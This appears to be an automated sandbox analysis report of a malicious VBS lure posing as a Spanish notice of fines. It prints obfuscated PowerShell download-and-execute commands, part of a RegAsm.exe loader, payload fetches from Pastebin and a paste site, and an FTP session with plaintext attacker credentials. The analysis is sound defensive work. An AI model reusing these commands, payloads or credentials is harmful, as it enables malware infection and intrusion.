                                                            2024-09-24 21:42:10 UTC1724INData Raw: 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2
                                                            Data Ascii: :::I:::C:::::::::::::::CC:::Eg::::::::::::
                                                            2024-09-24 21:42:10 UTC4744INData Raw: 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6f 6f 53 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 69 6f 65 e2 86 93 3a e2 86 93 69 67 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4b 68 34 43 4b e2 86 93 3a e2 86 93 4d e2 86
                                                            Data Ascii: ::::::::::::::::::::::::::BooS:::Bioe:igB:::KKh4CK:M
                                                            2024-09-24 21:42:10 UTC5930INData Raw: 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 6a 30 e2 86 93 3a e2 86 93 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 67 7a 2b 46 52 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 58 4b 39 38 53 44 66 34 56 46 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 68 67 72 31 42 49 4d 30 42 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 6f 44 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 67 36 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4b 44 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86
                                                            Data Ascii: :::Q::::Gw:::Dj0:w::Egz+FRY:::IXK98SDf4VFQ:::hgr1BIM0BY:::IoDw::Cig6:::KKDs::
                                                            2024-09-24 21:42:10 UTC1620INData Raw: 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4f 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 74 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 69 68 5a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 43 78 63 72 34 78 59 4d 43 e2 86 93 3a e2 86 93 65 4f 61 66 34 45 4c 43 34 48 43 e2 86 93 3a e2 86 93 63 49 6b 77 30 4a 49 50 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 66 42 69 55 58 57 e2 86 93 3a e2 86 93 70 68 48 6d 49 4a 48 6d 4d 47 4a 52 64 59 43 6d 48 53 59 4e 47 64 47 43 75 30 43 42 64 59 44 42 6b 72 72 53 76 4b 42 33 4e 61 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2
                                                            Data Ascii: :::M::::Ow:::Ct::ihZ:::KCxcr4xYMC:eOaf4ELC4HC:cIkw0JIP8:::BfBiUXW:phHmIJHmMGJRdYCmHSYNGdGCu0CBdYDBkrrSvKB3Na:::
                                                            2024-09-24 21:42:10 UTC2INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2024-09-24 21:42:10 UTC4096INData Raw: 34 30 30 30 0d 0a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 67 43 49 e2 86 93 3a e2 86 93 71 51 49 42 67 44 38 42 32 67 49 43 67 44 34 e2 86 93 3a e2 86 93 6f 55 46 43 67 44 56 e2 86 93 3a e2 86 93 6f 55 46 44 67 42 76 43 67 38 47 42 67 43 71 42 36 51 49 44 67 e2 86 93 3a e2 86 93 38 42 67 38 47 44 67 e2 86 93 3a e2 86 93 6c 43 68 51 4a 44 67 42 62 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 38 47 44 67 42 6d e2 86 93 3a e2 86 93 67 38 47 44 67 44 46 e2 86 93 3a e2 86 93 51 38 47 44 67 e2 86 93 3a e2 86 93 6e 43 e2 86 93 3a e2 86 93 38 47 42 67 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 46 73 46 44 67 42 75 42 7a 51 4a 44 67 e2 86 93 3a e2 86 93 59 42 38 6b 47 44 67 43 44 43 2b 6f 47 43 67 43 59 e2 86 93 3a e2 86 93 72 51 47 43 67 43 6a e2 86 93 3a e2
                                                            Data Ascii: 4000::BgCI:qQIBgD8B2gICgD4:oUFCgDV:oUFDgBvCg8GBgCqB6QIDg:8Bg8GDg:lChQJDgBb::8GDgBm:g8GDgDF:Q8GDg:nC:8GBg:B:FsFDgBuBzQJDg:YB8kGDgCDC+oGCgCY:rQGCgCj:
                                                            2024-09-24 21:42:10 UTC10674INData Raw: e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 52 67 33 43 4d 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 67 43 46 49 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 47 44 45 49 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 45 67 6e e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4e e2 86 93 3a e2 86 93 77 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 53 42
                                                            Data Ascii: ::::ERg3CMY::gCFIg:::::GGDEI:Q:C::::::C::BEgn::N:wI::::::I::ESB
                                                            2024-09-24 21:42:10 UTC1620INData Raw: e2 86 93 e2 86 93 3a e2 86 93 59 48 79 e2 86 93 3a e2 86 93 48 78 e2 86 93 3a e2 86 93 54 45 49 7a 51 48 35 e2 86 93 3a e2 86 93 54 45 49 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 4a e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 52 e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 5a e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 68 e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 70 e2 86 93 3a e2 86 93 6a 45 49 33 51 e2 86 93 3a e2 86 93 78 e2 86 93 3a e2 86 93 6a 45 49 30 67 45 35 e2 86 93 3a e2 86 93 6a 45 49 33 51 42 42 e2 86 93 3a e2 86 93 6a 45 49 33 51 42 4a e2 86 93 3a e2 86 93 6a 45 49 33 51 42 52 e2 86 93 3a e2 86 93 6a 45 49 e2 86 93 3a e2 86 93
                                                            Data Ascii: :YHy:Hx:TEIzQH5:TEI:Q:B:jEI3Q:J:jEI3Q:R:jEI3Q:Z:jEI3Q:h:jEI3Q:p:jEI3Q:x:jEI0gE5:jEI3QBB:jEI3QBJ:jEI3QBR:jEI:
                                                            2024-09-24 21:42:10 UTC2INData Raw: 0d 0a
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.54971176.76.21.224431088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-24 21:42:13 UTC96OUTGET /pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw HTTP/1.1
                                                            Host: pastecodeapp.vercel.app
                                                            2024-09-24 21:42:13 UTC463INHTTP/1.1 200 OK
                                                            Age: 0
                                                            Cache-Control: public, max-age=0, must-revalidate
                                                            Content-Type: text/plain;charset=UTF-8
                                                            Date: Tue, 24 Sep 2024 21:42:13 GMT
                                                            Server: Vercel
                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                            Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch
                                                            X-Matched-Path: /pastes/[id]/raw
                                                            X-Vercel-Cache: MISS
                                                            X-Vercel-Id: iad1::fra1::sxbwt-1727214133524-72ee29530da8
                                                            Connection: close
                                                            Transfer-Encoding: chunked
                                                            2024-09-24 21:42:13 UTC548INData Raw: 32 31 64 0d 0a 24 64 71 73 78 42 20 3d 20 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 4d 69 63 72 6f 73 6f 66 74 2e 4e 45 54 5c 27 20 2b 20 27 46 72 61 6d 65 77 6f 72 6b 5c 76 34 2e 30 2e 33 30 33 31 39 5c 27 20 2b 20 27 52 65 67 41 73 6d 2e 65 78 65 27 3b 0a 0a 24 66 56 4c 46 55 20 3d 20 27 e2 86 93 3a e2 86 93 27 3b 0a 24 6a 75 4e 6d 51 20 3d 20 27 41 27 3b 0a 0a 24 57 59 76 74 74 20 3d 20 27 25 71 6c 78 4b 50 25 27 2e 72 65 70 6c 61 63 65 28 20 24 66 56 4c 46 55 2c 20 24 6a 75 4e 6d 51 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 6c 61 57 77 4a 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 57 59 76 74 74 20 29 3b 0a 0a 24 6d 5a 69 6f 61 20 3d 20 27 25 6e 6b 47 4d 76 25 27 2e 72 65 70 6c 61
                                                            Data Ascii: 21d$dqsxB = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'RegAsm.exe';$fVLFU = ':';$juNmQ = 'A';$WYvtt = '%qlxKP%'.replace( $fVLFU, $juNmQ );[Byte[]] $laWwJ = [System.Convert]::FromBase64String( $WYvtt );$mZioa = '%nkGMv%'.repla
                                                            2024-09-24 21:42:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549712104.20.4.2354435792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-24 21:42:16 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-09-24 21:42:16 UTC391INHTTP/1.1 200 OK
                                                            Date: Tue, 24 Sep 2024 21:42:16 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: EXPIRED
                                                            Last-Modified: Tue, 24 Sep 2024 21:42:16 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8c85f17e9b5817ed-EWR
                                                            2024-09-24 21:42:16 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                            Data Ascii: 6false,
                                                            2024-09-24 21:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.556146104.20.4.2354437428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-24 21:42:25 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-09-24 21:42:25 UTC395INHTTP/1.1 200 OK
                                                            Date: Tue, 24 Sep 2024 21:42:25 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 9
                                                            Last-Modified: Tue, 24 Sep 2024 21:42:16 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8c85f1b89c117d05-EWR
                                                            2024-09-24 21:42:25 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                            Data Ascii: 6false,
                                                            2024-09-24 21:42:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.556147104.20.4.2354437656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-24 21:42:33 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-09-24 21:42:33 UTC396INHTTP/1.1 200 OK
                                                            Date: Tue, 24 Sep 2024 21:42:33 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 17
                                                            Last-Modified: Tue, 24 Sep 2024 21:42:16 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8c85f1eca98f42ec-EWR
                                                            2024-09-24 21:42:33 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                            Data Ascii: 6false,
                                                            2024-09-24 21:42:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                            Sep 24, 2024 23:42:04.252587080 CEST2149704191.252.83.213192.168.2.5220 "Servico de FTP da Locaweb"
                                                            Sep 24, 2024 23:42:04.253403902 CEST4970421192.168.2.5191.252.83.213USER desckvbrat1
                                                            Sep 24, 2024 23:42:04.474591017 CEST2149704191.252.83.213192.168.2.5331 Username ok, send password.
                                                            Sep 24, 2024 23:42:04.474827051 CEST4970421192.168.2.5191.252.83.213PASS developerpro21578Jp@@
                                                            Sep 24, 2024 23:42:04.705015898 CEST2149704191.252.83.213192.168.2.5230 Login successful.
                                                            Sep 24, 2024 23:42:04.925755978 CEST2149704191.252.83.213192.168.2.5501 Invalid argument.
                                                            Sep 24, 2024 23:42:04.925973892 CEST4970421192.168.2.5191.252.83.213PWD
                                                            Sep 24, 2024 23:42:05.146946907 CEST2149704191.252.83.213192.168.2.5257 "/" is the current directory.
                                                            Sep 24, 2024 23:42:05.147140980 CEST4970421192.168.2.5191.252.83.213TYPE I
                                                            Sep 24, 2024 23:42:05.369565964 CEST2149704191.252.83.213192.168.2.5200 Type set to: Binary.
                                                            Sep 24, 2024 23:42:05.369791031 CEST4970421192.168.2.5191.252.83.213PASV
                                                            Sep 24, 2024 23:42:05.598150015 CEST2149704191.252.83.213192.168.2.5227 Entering passive mode (191,252,83,213,238,45).
                                                            Sep 24, 2024 23:42:05.606169939 CEST4970421192.168.2.5191.252.83.213RETR Upcrypter/01/DLL01.txt
                                                            Sep 24, 2024 23:42:05.841496944 CEST2149704191.252.83.213192.168.2.5150 File status okay. About to open data connection.
                                                            Sep 24, 2024 23:42:06.241117954 CEST2149704191.252.83.213192.168.2.5226 Transfer complete.
                                                            Sep 24, 2024 23:42:08.558604956 CEST4970421192.168.2.5191.252.83.213PASV
                                                            Sep 24, 2024 23:42:08.779620886 CEST2149704191.252.83.213192.168.2.5227 Entering passive mode (191,252,83,213,235,180).
                                                            Sep 24, 2024 23:42:08.785200119 CEST4970421192.168.2.5191.252.83.213RETR Upcrypter/01/Rumpe.txt
                                                            Sep 24, 2024 23:42:09.006505966 CEST2149704191.252.83.213192.168.2.5150 File status okay. About to open data connection.
                                                            Sep 24, 2024 23:42:09.401283979 CEST2149704191.252.83.213192.168.2.5226 Transfer complete.
                                                            Sep 24, 2024 23:42:12.080056906 CEST4970421192.168.2.5191.252.83.213PASV
                                                            Sep 24, 2024 23:42:12.301886082 CEST2149704191.252.83.213192.168.2.5227 Entering passive mode (191,252,83,213,235,166).
                                                            Sep 24, 2024 23:42:12.307770967 CEST4970421192.168.2.5191.252.83.213RETR Upcrypter/01/Entry.txt
                                                            Sep 24, 2024 23:42:12.532241106 CEST2149704191.252.83.213192.168.2.5150 File status okay. About to open data connection.
                                                            Sep 24, 2024 23:42:12.946691990 CEST2149704191.252.83.213192.168.2.5226 Transfer complete.

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:17:41:58
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
                                                            Imagebase:0x7ff692c80000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:17:41:59
                                                            Start date:24/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c???BK???Dg???Nw???1???DE???MgBv???HI???c???By???GU???c???Bv???Gw???ZQB2???GU???Z??????n???Cw???KQ???p???Dk???N??????s???DY???MQ???x???Cw???Nw???5???Cw???N??????x???DE???L??????4???Dk???L??????4???DE???MQ???s???Dc???M??????x???Cw???OQ???5???Cw???NQ???x???DE???L??????x???D??????MQ???s???D??????M??????x???Cg???XQBd???Fs???cgBh???Gg???YwBb???C??????bgBp???G8???ag???t???Cg???K???Bs???GE???aQB0???G4???ZQBk???GU???cgBD???Gs???cgBv???Hc???d???Bl???E4???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???C??????d???Bj???GU???agBi???G8???LQB3???GU???bg???g???D0???I???Bz???Gw???YQBp???HQ???bgBl???GQ???ZQBy???EM???LgB6???HQ???e???Bo???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???OwBn???FM???egBD???EI???b??????k???Ds???Mg???x???HM???b???BU???Do???OgBd???GU???c???B5???FQ???b???Bv???GM???bwB0???G8???cgBQ???Hk???d???Bp???HI???dQBj???GU???Uw???u???HQ???ZQBO???C4???bQBl???HQ???cwB5???FM???Ww???g???D0???I???Bs???G8???YwBv???HQ???bwBy???F??????eQB0???Gk???cgB1???GM???ZQBT???Do???OgBd???HI???ZQBn???GE???bgBh???E0???d???Bu???Gk???bwBQ???GU???YwBp???HY???cgBl???FM???LgB0???GU???Tg???u???G0???ZQB0???HM???eQBT???Fs???OwB9???GU???dQBy???HQ???J???B7???C??????PQ???g???Gs???YwBh???GI???b???Bs???GE???QwBu???G8???aQB0???GE???Z???Bp???Gw???YQBW???GU???d???Bh???GM???aQBm???Gk???d???By???GU???QwBy???GU???dgBy???GU???Uw???6???Do???XQBy???GU???ZwBh???G4???YQBN???HQ???bgBp???G8???U???Bl???GM???aQB2???HI???ZQBT???C4???d???Bl???E4???LgBt???GU???d???Bz???Hk???UwBb???Hs???I???Bl???HM???b???Bl???H0???I???Bm???C8???I??????w???C??????d??????v???C??????cg???v???C??????ZQB4???GU???LgBu???Hc???bwBk???HQ???dQBo???HM???I??????7???Cc???M??????4???DE???I???Bw???GU???ZQBs???HM???Jw???g???GQ???bgBh???G0???bQBv???GM???LQ???g???GU???e???Bl???C4???b???Bs???GU???a???Bz???HI???ZQB3???G8???c??????7???C??????ZQBj???HI???bwBm???C0???I??????p???C??????JwBw???HU???d???By???GE???d???BT???Fw???cwBt???GE???cgBn???G8???cgBQ???Fw???dQBu???GU???TQ???g???HQ???cgBh???HQ???UwBc???HM???dwBv???GQ???bgBp???Fc???X???B0???GY???bwBz???G8???cgBj???Gk???TQBc???Gc???bgBp???G0???YQBv???FI???X???Bh???HQ???YQBE???H??????c???BB???Fw???Jw???g???Cs???I???Ba???Es???bgBZ???E0???J??????g???Cg???I???Bu???G8???aQB0???GE???bgBp???HQ???cwBl???EQ???LQ???g???Cc???JQBJ???Gg???cQBS???Fg???JQ???n???C??????bQBl???HQ???SQ???t???Hk???c???Bv???EM???I??????7???C??????d???By???GE???d???Bz???GU???cgBv???G4???Lw???g???HQ???ZQBp???HU???cQ???v???C??????RwBj???Fc???aQBS???C??????ZQB4???GU???LgBh???HM???dQB3???C??????ZQB4???GU???LgBs???Gw???ZQBo???HM???cgBl???Hc???bwBw???C??????Ow???p???Cc???dQBz???G0???LgBu???Gk???dwBw???FU???X??????n???C??????Kw???g???E4???SgBU???Hg???R??????k???Cg???I??????9???C??????RwBj???Fc???aQBS???Ds???KQ???g???GU???bQBh???E4???cgBl???HM???VQ???6???Do???XQB0???G4???ZQBt???G4???bwBy???Gk???dgBu???EU???Ww???g???Cs???I??????n???Fw???cwBy???GU???cwBV???Fw???OgBD???Cc???K??????g???D0???I???Ba???Es???bgBZ???E0???J??????7???Ck???JwB1???HM???bQ???u???G4???aQB3???H??????VQBc???Cc???I??????r???C??????TgBK???FQ???e???BE???CQ???I??????s???EI???SwBM???FI???VQ???k???Cg???ZQBs???Gk???RgBk???GE???bwBs???G4???dwBv???EQ???LgBu???Eo???eQBW???Go???J??????7???Dg???RgBU???FU???Og???6???F0???ZwBu???Gk???Z???Bv???GM???bgBF???C4???d???B4???GU???V??????u???G0???ZQB0???HM???eQBT???Fs???I??????9???C??????ZwBu???Gk???Z???Bv???GM???bgBF???C4???bgBK???Hk???VgBq???CQ???Ow???p???HQ???bgBl???Gk???b???BD???GI???ZQBX???C4???d???Bl???E4???I???B0???GM???ZQBq???GI???Tw???t???Hc???ZQBO???Cg???I??????9???C??????bgBK???Hk???VgBq???CQ???OwB9???Ds???I??????p???Cc???d???BP???Ew???YwBf???Es???YQ???z???Fo???ZgBv???Fg???MgBK???Eo???cgBW???Gg???bQBW???Dk???YwBt???Dk???W???Bz???HU???W???Bt???Go???MQBn???DE???Jw???g???Cs???I???Bv???Hg???SwBV???Gc???J??????o???C??????PQ???g???G8???e???BL???FU???Zw???k???Hs???I???Bl???HM???b???Bl???H0???Ow???g???Ck???Jw???y???DQ???dQBY???Eo???V???Bx???GE???bQBn???Hk???TQB0???EY???egBh???Gs???U???BS???DE???cQBf???Ek???dgBH???Gk???W???BO???GQ???cQBh???E4???MQ???n???C??????Kw???g???G8???e???BL???FU???Zw???k???CgAIAA9ACAAbwB4AEsAVQBnACQAewAgACkAIAB1AE4AQwBWAHEAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHUATgBDAFYAc